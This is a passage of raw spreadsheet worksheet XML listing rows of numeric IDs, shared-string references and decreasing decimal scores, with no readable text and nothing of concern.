      <c r="C17350" s="2" t="s">
        <v>16726</v>
      </c>
      <c r="D17350" s="2">
        <v>1.0</v>
      </c>
      <c r="E17350" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17350" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17351" ht="15.75" customHeight="1">
      <c r="A17351" s="1">
        <v>16801.0</v>
      </c>
      <c r="B17351" s="2">
        <v>4.77789E7</v>
      </c>
      <c r="C17351" s="2" t="s">
        <v>16727</v>
      </c>
      <c r="D17351" s="2">
        <v>1.0</v>
      </c>
      <c r="E17351" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17351" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="17352" ht="15.75" customHeight="1">
      <c r="A17352" s="1">
        <v>27652.0</v>
      </c>
      <c r="B17352" s="2">
        <v>2.2820024E7</v>
      </c>
      <c r="C17352" s="2" t="s">
        <v>16728</v>
      </c>
      <c r="D17352" s="2">
        <v>1.0</v>
      </c>
      <c r="E17352" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17352" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="17353" ht="15.75" customHeight="1">
      <c r="A17353" s="1">
        <v>29388.0</v>
      </c>
      <c r="B17353" s="2">
        <v>3.1878332E7</v>
      </c>
      <c r="C17353" s="2" t="s">
        <v>16729</v>
      </c>
      <c r="D17353" s="2">
        <v>1.0</v>
      </c>
      <c r="E17353" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17353" s="2">
        <v>0.1254789272030652</v>
      </c>
    </row>
    <row r="17354" ht="15.75" customHeight="1">
      <c r="A17354" s="1">
        <v>33108.0</v>
      </c>
      <c r="B17354" s="2">
        <v>6958288.0</v>
      </c>
      <c r="C17354" s="2" t="s">
        <v>16730</v>
      </c>
      <c r="D17354" s="2">
        <v>1.0</v>
      </c>
      <c r="E17354" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17354" s="2">
        <v>0.1254789272030652</v>
      </c>
    </row>
    <row r="17355" ht="15.75" customHeight="1">
      <c r="A17355" s="1">
        <v>4477.0</v>
      </c>
      <c r="B17355" s="2">
        <v>4.2483084E7</v>
      </c>
      <c r="C17355" s="2" t="s">
        <v>16731</v>
      </c>
      <c r="D17355" s="2">
        <v>1.0</v>
      </c>
      <c r="E17355" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17355" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="17356" ht="15.75" customHeight="1">
      <c r="A17356" s="1">
        <v>25715.0</v>
      </c>
      <c r="B17356" s="2">
        <v>1.4530134E7</v>
      </c>
      <c r="C17356" s="2" t="s">
        <v>16732</v>
      </c>
      <c r="D17356" s="2">
        <v>1.0</v>
      </c>
      <c r="E17356" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17356" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="17357" ht="15.75" customHeight="1">
      <c r="A17357" s="1">
        <v>31953.0</v>
      </c>
      <c r="B17357" s="2">
        <v>5310073.0</v>
      </c>
      <c r="C17357" s="2" t="s">
        <v>16733</v>
      </c>
      <c r="D17357" s="2">
        <v>1.0</v>
      </c>
      <c r="E17357" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17357" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="17358" ht="15.75" customHeight="1">
      <c r="A17358" s="1">
        <v>27414.0</v>
      </c>
      <c r="B17358" s="2">
        <v>2.1815326E7</v>
      </c>
      <c r="C17358" s="2" t="s">
        <v>16734</v>
      </c>
      <c r="D17358" s="2">
        <v>1.0</v>
      </c>
      <c r="E17358" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17358" s="2">
        <v>0.1254208754208754</v>
      </c>
    </row>
    <row r="17359" ht="15.75" customHeight="1">
      <c r="A17359" s="1">
        <v>21443.0</v>
      </c>
      <c r="B17359" s="2">
        <v>2.239898E7</v>
      </c>
      <c r="C17359" s="2" t="s">
        <v>16735</v>
      </c>
      <c r="D17359" s="2">
        <v>1.0</v>
      </c>
      <c r="E17359" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17359" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="17360" ht="15.75" customHeight="1">
      <c r="A17360" s="1">
        <v>29954.0</v>
      </c>
      <c r="B17360" s="2">
        <v>3607650.0</v>
      </c>
      <c r="C17360" s="2" t="s">
        <v>16736</v>
      </c>
      <c r="D17360" s="2">
        <v>1.0</v>
      </c>
      <c r="E17360" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17360" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="17361" ht="15.75" customHeight="1">
      <c r="A17361" s="1">
        <v>27923.0</v>
      </c>
      <c r="B17361" s="2">
        <v>2.3770519E7</v>
      </c>
      <c r="C17361" s="2" t="s">
        <v>16737</v>
      </c>
      <c r="D17361" s="2">
        <v>1.0</v>
      </c>
      <c r="E17361" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17361" s="2">
        <v>0.1252072968490879</v>
      </c>
    </row>
    <row r="17362" ht="15.75" customHeight="1">
      <c r="A17362" s="1">
        <v>32015.0</v>
      </c>
      <c r="B17362" s="2">
        <v>5.3488065E7</v>
      </c>
      <c r="C17362" s="2" t="s">
        <v>16664</v>
      </c>
      <c r="D17362" s="2">
        <v>1.0</v>
      </c>
      <c r="E17362" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17362" s="2">
        <v>0.1252072968490879</v>
      </c>
    </row>
    <row r="17363" ht="15.75" customHeight="1">
      <c r="A17363" s="1">
        <v>7189.0</v>
      </c>
      <c r="B17363" s="2">
        <v>5.0573182E7</v>
      </c>
      <c r="C17363" s="2" t="s">
        <v>16738</v>
      </c>
      <c r="D17363" s="2">
        <v>1.0</v>
      </c>
      <c r="E17363" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17363" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="17364" ht="15.75" customHeight="1">
      <c r="A17364" s="1">
        <v>16592.0</v>
      </c>
      <c r="B17364" s="2">
        <v>4.6980343E7</v>
      </c>
      <c r="C17364" s="2" t="s">
        <v>16739</v>
      </c>
      <c r="D17364" s="2">
        <v>1.0</v>
      </c>
      <c r="E17364" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17364" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="17365" ht="15.75" customHeight="1">
      <c r="A17365" s="1">
        <v>26370.0</v>
      </c>
      <c r="B17365" s="2">
        <v>1.688861E7</v>
      </c>
      <c r="C17365" s="2" t="s">
        <v>16740</v>
      </c>
      <c r="D17365" s="2">
        <v>1.0</v>
      </c>
      <c r="E17365" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17365" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="17366" ht="15.75" customHeight="1">
      <c r="A17366" s="1">
        <v>29305.0</v>
      </c>
      <c r="B17366" s="2">
        <v>3.1262736E7</v>
      </c>
      <c r="C17366" s="2" t="s">
        <v>16741</v>
      </c>
      <c r="D17366" s="2">
        <v>1.0</v>
      </c>
      <c r="E17366" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17366" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="17367" ht="15.75" customHeight="1">
      <c r="A17367" s="1">
        <v>32905.0</v>
      </c>
      <c r="B17367" s="2">
        <v>6396181.0</v>
      </c>
      <c r="C17367" s="2" t="s">
        <v>16742</v>
      </c>
      <c r="D17367" s="2">
        <v>1.0</v>
      </c>
      <c r="E17367" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17367" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="17368" ht="15.75" customHeight="1">
      <c r="A17368" s="1">
        <v>18049.0</v>
      </c>
      <c r="B17368" s="2">
        <v>5.1573913E7</v>
      </c>
      <c r="C17368" s="2" t="s">
        <v>16743</v>
      </c>
      <c r="D17368" s="2">
        <v>1.0</v>
      </c>
      <c r="E17368" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17368" s="2">
        <v>0.1247723132969035</v>
      </c>
    </row>
    <row r="17369" ht="15.75" customHeight="1">
      <c r="A17369" s="1">
        <v>32983.0</v>
      </c>
      <c r="B17369" s="2">
        <v>6601666.0</v>
      </c>
      <c r="C17369" s="2" t="s">
        <v>16744</v>
      </c>
      <c r="D17369" s="2">
        <v>1.0</v>
      </c>
      <c r="E17369" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17369" s="2">
        <v>0.1247723132969035</v>
      </c>
    </row>
    <row r="17370" ht="15.75" customHeight="1">
      <c r="A17370" s="1">
        <v>27237.0</v>
      </c>
      <c r="B17370" s="2">
        <v>2.1047142E7</v>
      </c>
      <c r="C17370" s="2" t="s">
        <v>16745</v>
      </c>
      <c r="D17370" s="2">
        <v>1.0</v>
      </c>
      <c r="E17370" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17370" s="2">
        <v>0.1247379454926625</v>
      </c>
    </row>
    <row r="17371" ht="15.75" customHeight="1">
      <c r="A17371" s="1">
        <v>554.0</v>
      </c>
      <c r="B17371" s="2">
        <v>1.8808563E7</v>
      </c>
      <c r="C17371" s="2" t="s">
        <v>16746</v>
      </c>
      <c r="D17371" s="2">
        <v>1.0</v>
      </c>
      <c r="E17371" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17371" s="2">
        <v>0.1245519713261649</v>
      </c>
    </row>
    <row r="17372" ht="15.75" customHeight="1">
      <c r="A17372" s="1">
        <v>1709.0</v>
      </c>
      <c r="B17372" s="2">
        <v>2.8572219E7</v>
      </c>
      <c r="C17372" s="2" t="s">
        <v>16747</v>
      </c>
      <c r="D17372" s="2">
        <v>1.0</v>
      </c>
      <c r="E17372" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17372" s="2">
        <v>0.1245519713261649</v>
      </c>
    </row>
    <row r="17373" ht="15.75" customHeight="1">
      <c r="A17373" s="1">
        <v>20144.0</v>
      </c>
      <c r="B17373" s="2">
        <v>1.0157633E7</v>
      </c>
      <c r="C17373" s="2" t="s">
        <v>16748</v>
      </c>
      <c r="D17373" s="2">
        <v>1.0</v>
      </c>
      <c r="E17373" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17373" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="17374" ht="15.75" customHeight="1">
      <c r="A17374" s="1">
        <v>17907.0</v>
      </c>
      <c r="B17374" s="2">
        <v>5.1108539E7</v>
      </c>
      <c r="C17374" s="2" t="s">
        <v>16749</v>
      </c>
      <c r="D17374" s="2">
        <v>1.0</v>
      </c>
      <c r="E17374" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17374" s="2">
        <v>0.1243386243386244</v>
      </c>
    </row>
    <row r="17375" ht="15.75" customHeight="1">
      <c r="A17375" s="1">
        <v>6405.0</v>
      </c>
      <c r="B17375" s="2">
        <v>4.8491033E7</v>
      </c>
      <c r="C17375" s="2" t="s">
        <v>16750</v>
      </c>
      <c r="D17375" s="2">
        <v>1.0</v>
      </c>
      <c r="E17375" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17375" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="17376" ht="15.75" customHeight="1">
      <c r="A17376" s="1">
        <v>16812.0</v>
      </c>
      <c r="B17376" s="2">
        <v>4.781841E7</v>
      </c>
      <c r="C17376" s="2" t="s">
        <v>16751</v>
      </c>
      <c r="D17376" s="2">
        <v>1.0</v>
      </c>
      <c r="E17376" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17376" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="17377" ht="15.75" customHeight="1">
      <c r="A17377" s="1">
        <v>25554.0</v>
      </c>
      <c r="B17377" s="2">
        <v>1.4280844E7</v>
      </c>
      <c r="C17377" s="2" t="s">
        <v>16752</v>
      </c>
      <c r="D17377" s="2">
        <v>1.0</v>
      </c>
      <c r="E17377" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17377" s="2">
        <v>0.1241319444444444</v>
      </c>
    </row>
    <row r="17378" ht="15.75" customHeight="1">
      <c r="A17378" s="1">
        <v>10482.0</v>
      </c>
      <c r="B17378" s="2">
        <v>1.0956495E7</v>
      </c>
      <c r="C17378" s="2" t="s">
        <v>16753</v>
      </c>
      <c r="D17378" s="2">
        <v>1.0</v>
      </c>
      <c r="E17378" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17378" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="17379" ht="15.75" customHeight="1">
      <c r="A17379" s="1">
        <v>16283.0</v>
      </c>
      <c r="B17379" s="2">
        <v>4.5796131E7</v>
      </c>
      <c r="C17379" s="2" t="s">
        <v>16754</v>
      </c>
      <c r="D17379" s="2">
        <v>1.0</v>
      </c>
      <c r="E17379" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17379" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="17380" ht="15.75" customHeight="1">
      <c r="A17380" s="1">
        <v>20649.0</v>
      </c>
      <c r="B17380" s="2">
        <v>1.4255154E7</v>
      </c>
      <c r="C17380" s="2" t="s">
        <v>16755</v>
      </c>
      <c r="D17380" s="2">
        <v>1.0</v>
      </c>
      <c r="E17380" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17380" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="17381" ht="15.75" customHeight="1">
      <c r="A17381" s="1">
        <v>24151.0</v>
      </c>
      <c r="B17381" s="2">
        <v>1.0082543E7</v>
      </c>
      <c r="C17381" s="2" t="s">
        <v>16756</v>
      </c>
      <c r="D17381" s="2">
        <v>1.0</v>
      </c>
      <c r="E17381" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17381" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="17382" ht="15.75" customHeight="1">
      <c r="A17382" s="1">
        <v>28938.0</v>
      </c>
      <c r="B17382" s="2">
        <v>2.9641281E7</v>
      </c>
      <c r="C17382" s="2" t="s">
        <v>16757</v>
      </c>
      <c r="D17382" s="2">
        <v>1.0</v>
      </c>
      <c r="E17382" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17382" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="17383" ht="15.75" customHeight="1">
      <c r="A17383" s="1">
        <v>30913.0</v>
      </c>
      <c r="B17383" s="2">
        <v>4.6779818E7</v>
      </c>
      <c r="C17383" s="2" t="s">
        <v>16758</v>
      </c>
      <c r="D17383" s="2">
        <v>1.0</v>
      </c>
      <c r="E17383" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17383" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="17384" ht="15.75" customHeight="1">
      <c r="A17384" s="1">
        <v>4.0</v>
      </c>
      <c r="B17384" s="2">
        <v>1.0132153E7</v>
      </c>
      <c r="C17384" s="2" t="s">
        <v>16759</v>
      </c>
      <c r="D17384" s="2">
        <v>1.0</v>
      </c>
      <c r="E17384" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17384" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="17385" ht="15.75" customHeight="1">
      <c r="A17385" s="1">
        <v>6691.0</v>
      </c>
      <c r="B17385" s="2">
        <v>4.9179821E7</v>
      </c>
      <c r="C17385" s="2" t="s">
        <v>16760</v>
      </c>
      <c r="D17385" s="2">
        <v>1.0</v>
      </c>
      <c r="E17385" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17385" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="17386" ht="15.75" customHeight="1">
      <c r="A17386" s="1">
        <v>13938.0</v>
      </c>
      <c r="B17386" s="2">
        <v>3.7167068E7</v>
      </c>
      <c r="C17386" s="2" t="s">
        <v>16761</v>
      </c>
      <c r="D17386" s="2">
        <v>1.0</v>
      </c>
      <c r="E17386" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17386" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="17387" ht="15.75" customHeight="1">
      <c r="A17387" s="1">
        <v>22066.0</v>
      </c>
      <c r="B17387" s="2">
        <v>3.0556082E7</v>
      </c>
      <c r="C17387" s="2" t="s">
        <v>16712</v>
      </c>
      <c r="D17387" s="2">
        <v>1.0</v>
      </c>
      <c r="E17387" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17387" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="17388" ht="15.75" customHeight="1">
      <c r="A17388" s="1">
        <v>24068.0</v>
      </c>
      <c r="B17388" s="2">
        <v>9656767.0</v>
      </c>
      <c r="C17388" s="2" t="s">
        <v>16762</v>
      </c>
      <c r="D17388" s="2">
        <v>1.0</v>
      </c>
      <c r="E17388" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17388" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="17389" ht="15.75" customHeight="1">
      <c r="A17389" s="1">
        <v>25671.0</v>
      </c>
      <c r="B17389" s="2">
        <v>1.4524655E7</v>
      </c>
      <c r="C17389" s="2" t="s">
        <v>16763</v>
      </c>
      <c r="D17389" s="2">
        <v>1.0</v>
      </c>
      <c r="E17389" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17389" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="17390" ht="15.75" customHeight="1">
      <c r="A17390" s="1">
        <v>25964.0</v>
      </c>
      <c r="B17390" s="2">
        <v>1.526871E7</v>
      </c>
      <c r="C17390" s="2" t="s">
        <v>16764</v>
      </c>
      <c r="D17390" s="2">
        <v>1.0</v>
      </c>
      <c r="E17390" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17390" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="17391" ht="15.75" customHeight="1">
      <c r="A17391" s="1">
        <v>26269.0</v>
      </c>
      <c r="B17391" s="2">
        <v>1.6377141E7</v>
      </c>
      <c r="C17391" s="2" t="s">
        <v>16765</v>
      </c>
      <c r="D17391" s="2">
        <v>1.0</v>
      </c>
      <c r="E17391" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17391" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="17392" ht="15.75" customHeight="1">
      <c r="A17392" s="1">
        <v>26457.0</v>
      </c>
      <c r="B17392" s="2">
        <v>1.731204E7</v>
      </c>
      <c r="C17392" s="2" t="s">
        <v>16766</v>
      </c>
      <c r="D17392" s="2">
        <v>1.0</v>
      </c>
      <c r="E17392" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17392" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="17393" ht="15.75" customHeight="1">
      <c r="A17393" s="1">
        <v>28837.0</v>
      </c>
      <c r="B17393" s="2">
        <v>2.8913708E7</v>
      </c>
      <c r="C17393" s="2" t="s">
        <v>16767</v>
      </c>
      <c r="D17393" s="2">
        <v>1.0</v>
      </c>
      <c r="E17393" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17393" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="17394" ht="15.75" customHeight="1">
      <c r="A17394" s="1">
        <v>16175.0</v>
      </c>
      <c r="B17394" s="2">
        <v>4.5646046E7</v>
      </c>
      <c r="C17394" s="2" t="s">
        <v>16768</v>
      </c>
      <c r="D17394" s="2">
        <v>1.0</v>
      </c>
      <c r="E17394" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17394" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="17395" ht="15.75" customHeight="1">
      <c r="A17395" s="1">
        <v>905.0</v>
      </c>
      <c r="B17395" s="2">
        <v>2.2134681E7</v>
      </c>
      <c r="C17395" s="2" t="s">
        <v>16769</v>
      </c>
      <c r="D17395" s="2">
        <v>1.0</v>
      </c>
      <c r="E17395" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17395" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17396" ht="15.75" customHeight="1">
      <c r="A17396" s="1">
        <v>5761.0</v>
      </c>
      <c r="B17396" s="2">
        <v>4.6674355E7</v>
      </c>
      <c r="C17396" s="2" t="s">
        <v>16770</v>
      </c>
      <c r="D17396" s="2">
        <v>1.0</v>
      </c>
      <c r="E17396" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17396" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17397" ht="15.75" customHeight="1">
      <c r="A17397" s="1">
        <v>6545.0</v>
      </c>
      <c r="B17397" s="2">
        <v>4.8854031E7</v>
      </c>
      <c r="C17397" s="2" t="s">
        <v>16771</v>
      </c>
      <c r="D17397" s="2">
        <v>1.0</v>
      </c>
      <c r="E17397" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17397" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17398" ht="15.75" customHeight="1">
      <c r="A17398" s="1">
        <v>7395.0</v>
      </c>
      <c r="B17398" s="2">
        <v>5.1100805E7</v>
      </c>
      <c r="C17398" s="2" t="s">
        <v>16772</v>
      </c>
      <c r="D17398" s="2">
        <v>1.0</v>
      </c>
      <c r="E17398" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17398" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17399" ht="15.75" customHeight="1">
      <c r="A17399" s="1">
        <v>11268.0</v>
      </c>
      <c r="B17399" s="2">
        <v>2.0689132E7</v>
      </c>
      <c r="C17399" s="2" t="s">
        <v>16773</v>
      </c>
      <c r="D17399" s="2">
        <v>1.0</v>
      </c>
      <c r="E17399" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17399" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17400" ht="15.75" customHeight="1">
      <c r="A17400" s="1">
        <v>12738.0</v>
      </c>
      <c r="B17400" s="2">
        <v>3.1050828E7</v>
      </c>
      <c r="C17400" s="2" t="s">
        <v>16774</v>
      </c>
      <c r="D17400" s="2">
        <v>1.0</v>
      </c>
      <c r="E17400" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17400" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17401" ht="15.75" customHeight="1">
      <c r="A17401" s="1">
        <v>13161.0</v>
      </c>
      <c r="B17401" s="2">
        <v>3.3906346E7</v>
      </c>
      <c r="C17401" s="2" t="s">
        <v>16775</v>
      </c>
      <c r="D17401" s="2">
        <v>1.0</v>
      </c>
      <c r="E17401" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17401" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17402" ht="15.75" customHeight="1">
      <c r="A17402" s="1">
        <v>13780.0</v>
      </c>
      <c r="B17402" s="2">
        <v>3.6560484E7</v>
      </c>
      <c r="C17402" s="2" t="s">
        <v>16776</v>
      </c>
      <c r="D17402" s="2">
        <v>1.0</v>
      </c>
      <c r="E17402" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17402" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17403" ht="15.75" customHeight="1">
      <c r="A17403" s="1">
        <v>17480.0</v>
      </c>
      <c r="B17403" s="2">
        <v>4.9938898E7</v>
      </c>
      <c r="C17403" s="2" t="s">
        <v>16777</v>
      </c>
      <c r="D17403" s="2">
        <v>1.0</v>
      </c>
      <c r="E17403" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17403" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17404" ht="15.75" customHeight="1">
      <c r="A17404" s="1">
        <v>18176.0</v>
      </c>
      <c r="B17404" s="2">
        <v>5.1967924E7</v>
      </c>
      <c r="C17404" s="2" t="s">
        <v>16778</v>
      </c>
      <c r="D17404" s="2">
        <v>1.0</v>
      </c>
      <c r="E17404" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17404" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17405" ht="15.75" customHeight="1">
      <c r="A17405" s="1">
        <v>18832.0</v>
      </c>
      <c r="B17405" s="2">
        <v>5.3940684E7</v>
      </c>
      <c r="C17405" s="2" t="s">
        <v>16779</v>
      </c>
      <c r="D17405" s="2">
        <v>1.0</v>
      </c>
      <c r="E17405" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17405" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17406" ht="15.75" customHeight="1">
      <c r="A17406" s="1">
        <v>19048.0</v>
      </c>
      <c r="B17406" s="2">
        <v>5.4578302E7</v>
      </c>
      <c r="C17406" s="2" t="s">
        <v>16780</v>
      </c>
      <c r="D17406" s="2">
        <v>1.0</v>
      </c>
      <c r="E17406" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17406" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17407" ht="15.75" customHeight="1">
      <c r="A17407" s="1">
        <v>20050.0</v>
      </c>
      <c r="B17407" s="2">
        <v>7946275.0</v>
      </c>
      <c r="C17407" s="2" t="s">
        <v>16781</v>
      </c>
      <c r="D17407" s="2">
        <v>1.0</v>
      </c>
      <c r="E17407" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17407" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17408" ht="15.75" customHeight="1">
      <c r="A17408" s="1">
        <v>20572.0</v>
      </c>
      <c r="B17408" s="2">
        <v>1.3592788E7</v>
      </c>
      <c r="C17408" s="2" t="s">
        <v>16782</v>
      </c>
      <c r="D17408" s="2">
        <v>1.0</v>
      </c>
      <c r="E17408" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17408" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17409" ht="15.75" customHeight="1">
      <c r="A17409" s="1">
        <v>20980.0</v>
      </c>
      <c r="B17409" s="2">
        <v>1.6978645E7</v>
      </c>
      <c r="C17409" s="2" t="s">
        <v>16783</v>
      </c>
      <c r="D17409" s="2">
        <v>1.0</v>
      </c>
      <c r="E17409" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17409" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17410" ht="15.75" customHeight="1">
      <c r="A17410" s="1">
        <v>21667.0</v>
      </c>
      <c r="B17410" s="2">
        <v>2.5013369E7</v>
      </c>
      <c r="C17410" s="2" t="s">
        <v>16784</v>
      </c>
      <c r="D17410" s="2">
        <v>1.0</v>
      </c>
      <c r="E17410" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17410" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17411" ht="15.75" customHeight="1">
      <c r="A17411" s="1">
        <v>21696.0</v>
      </c>
      <c r="B17411" s="2">
        <v>2.5223234E7</v>
      </c>
      <c r="C17411" s="2" t="s">
        <v>16785</v>
      </c>
      <c r="D17411" s="2">
        <v>1.0</v>
      </c>
      <c r="E17411" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17411" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17412" ht="15.75" customHeight="1">
      <c r="A17412" s="1">
        <v>22078.0</v>
      </c>
      <c r="B17412" s="2">
        <v>3.0660796E7</v>
      </c>
      <c r="C17412" s="2" t="s">
        <v>16786</v>
      </c>
      <c r="D17412" s="2">
        <v>1.0</v>
      </c>
      <c r="E17412" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17412" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17413" ht="15.75" customHeight="1">
      <c r="A17413" s="1">
        <v>22540.0</v>
      </c>
      <c r="B17413" s="2">
        <v>3.8037295E7</v>
      </c>
      <c r="C17413" s="2" t="s">
        <v>16787</v>
      </c>
      <c r="D17413" s="2">
        <v>1.0</v>
      </c>
      <c r="E17413" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17413" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17414" ht="15.75" customHeight="1">
      <c r="A17414" s="1">
        <v>23341.0</v>
      </c>
      <c r="B17414" s="2">
        <v>5474639.0</v>
      </c>
      <c r="C17414" s="2" t="s">
        <v>16788</v>
      </c>
      <c r="D17414" s="2">
        <v>1.0</v>
      </c>
      <c r="E17414" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17414" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17415" ht="15.75" customHeight="1">
      <c r="A17415" s="1">
        <v>23889.0</v>
      </c>
      <c r="B17415" s="2">
        <v>8420433.0</v>
      </c>
      <c r="C17415" s="2" t="s">
        <v>16789</v>
      </c>
      <c r="D17415" s="2">
        <v>1.0</v>
      </c>
      <c r="E17415" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17415" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17416" ht="15.75" customHeight="1">
      <c r="A17416" s="1">
        <v>24832.0</v>
      </c>
      <c r="B17416" s="2">
        <v>1.2147577E7</v>
      </c>
      <c r="C17416" s="2" t="s">
        <v>16790</v>
      </c>
      <c r="D17416" s="2">
        <v>1.0</v>
      </c>
      <c r="E17416" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17416" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17417" ht="15.75" customHeight="1">
      <c r="A17417" s="1">
        <v>24913.0</v>
      </c>
      <c r="B17417" s="2">
        <v>1.234845E7</v>
      </c>
      <c r="C17417" s="2" t="s">
        <v>16791</v>
      </c>
